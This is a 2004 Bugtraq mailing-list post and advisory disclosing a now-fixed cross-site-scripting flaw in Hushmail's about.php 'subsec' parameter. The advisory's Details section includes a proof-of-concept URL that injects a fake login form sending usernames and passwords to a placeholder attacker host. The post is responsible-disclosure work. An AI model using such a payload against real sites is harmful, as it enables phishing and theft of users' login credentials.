<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerabilities in Hushmail.com



Hello Bugtraq,

There has been 2 vulnerabilities found in the secure Hushmail.com webmail/data
storage service.
One is a Cross-Site-Scripting vulnerability, and is discussed in the
attached advisory. This has now been fixed.

The second is currently in the progress of being fixed, and because of
this I will not be releasing details until the vulnerability is repaired.
When I do, they will be posted on my website 
(http://www.fribble.net/security.php)

Cheers,

Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
http://www.fribble.net
Cross-Site-Scripting vulnerabilities in Hushmail.com website
-------------- 9/03/2004 --------------

Discovered by: Calum Power [Enune]
Versions Affected: <= 8/03/2004
Unaffected versions: 9/03/2004

Vendor:
Hush Communications (www.hush.com)

Product Description:
Hushmail.com is a fast, secure and easy email service. Their products (ranging 
from basic Webmail to data storage)
are used all over the world (and by some of the world's top security experts) 
as a means of secure data transfer.


Summary:
Cross-site-scripting vulnerabilities in Hushmail.com website may allow for the 
manipulation
of data available to users.


Details:
A cross-site-scripting vulnerability exits in the page 
'https://www.hushmail.com/about.php'.
By manipulating the 'subsec' HTTP/GET variable, a malicious attacker could 
manipulate the output
of the about.php script to trick users into believing that a fraudulent page is 
legitimate.

For example, by manipulating the 'subsec' variable 
(https://www.hushmail.com/about.php?subsec=)
with the below string, an attacker could cause the Hushmail website to output a 
form, that may
trick the user into inputting their login information into a web form, which is 
then sent to a
website of the attackers choice:
https://www.hushmail.com/about.php?subsec=');</script><form 
action="http://attacker/script.php";>
Username: <input name="user">Password: <input name="pass"></form>


Impact:
The impact of this vulnerability on a company such as Hushmail could be huge, 
as their products are
marketed as being secure and safe. Attackers could use this vulnerability to 
'phish' for user logon details,
and possibly compromise encrypted accounts.

Acknowledgements:
Thanks to the Brian Smith of Hushmail for his speedy response. Hush 
Communications are definitely dedicated
to providing a top level of security and efficiency to their customers.

Aloha's:
rAchel, Marajin, ValTrum, packetstorm, neworder.box.sk, blacksun.box.sk, Peter 
Winter-Smith (I like your work =)